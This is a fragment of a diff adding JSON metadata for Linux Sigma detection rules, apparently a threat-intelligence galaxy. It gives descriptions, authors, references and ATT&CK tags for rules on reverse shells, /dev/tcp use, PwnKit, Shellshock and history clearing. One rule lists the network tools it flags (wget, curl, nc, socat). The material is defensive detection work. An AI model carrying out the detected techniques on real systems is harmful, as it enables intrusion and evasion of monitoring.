"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/09/17", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" + }, + { + "description": "Detects password policy discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community, Pawel Mazur", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_password_policy_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://attack.mitre.org/techniques/T1201/", + "https://linux.die.net/man/1/chage", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery" + }, + { + "description": "Detects a reload or a start of a service.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Installation of legitimate service.", + "Legitimate reconfiguration of service." + ], + "filename": "lnx_auditd_pers_systemd_reload.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start" + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/21", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencapture_import.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool" + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/13", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencaputre_xwd.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/xwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux" + }, + { + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with Steghide" + }, + { + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide" + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_susp_c2_commands.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities" + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/12/12", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_susp_cmds.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux" + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/23", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy web applications" + ], + "filename": "lnx_auditd_susp_exe_folders.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ] + }, + "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "lnx_auditd_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux" + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/02/03", + "falsepositive": [ + "Admin work like legit service installs." + ], + "filename": "lnx_auditd_systemd_service_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation" + }, + { + "description": "Detects System Information Discovery commands", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/03", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_info_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_system_info_discovery2.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - Linux" + }, + { + "description": "Detects extracting of zip file from image file", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File" + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_user_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery" + }, + { + "description": "Detects possible command execution by web application/web shell", + "meta": { + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "filename": "lnx_auditd_web_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution" + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_apt_equationgroup_lnx.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ] + }, + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators" + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_buffer_overflows.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/10", + "falsepositive": [ + "Log rotation" + ], + "filename": "lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin" + }, + { + "description": "Detects suspicious modification of crontab file.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/04/16", + "falsepositive": [ + "Legitimate modification of crontab" + ], + "filename": "lnx_crontab_file_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab" + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/18", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_file_copy.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy" + }, + { + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/05", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "filename": "lnx_ldso_preload_injection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ] + }, + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload" + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation" + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "meta": { + "author": "Sreeman", + "creation_date": "2022/01/26", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.001" + ] + }, + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation" + }, + { + "description": "Detects shellshock expressions in log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shellshock.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression" + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/03/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_clear_cmd_history.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://attack.mitre.org/techniques/T1070/003/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History" + }, + { + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/05", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "filename": "lnx_shell_priv_esc_prep.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation" + }, + { + "description": "Detects suspicious shell commands used in various exploit codes (see references)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_commands.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "https://artkond.com/2017/03/23/pivoting-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands" + }, + { + "description": "Detects suspicious log entries in Linux log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_log_entries.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries" + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_rev_shells.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line" + }, + { + "description": "Detects space after filename", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Typos" + ], + "filename": "lnx_space_after_filename_.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" + }, + { + "description": "Detects suspicious command with /dev/tcp", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_dev_tcp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ] + }, + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp" + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_jexboss.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss Command Sequence" + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_symlink_etc_passwd.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ] + }, + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd" + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_doas_conf_creation.yml", + "level": "medium", 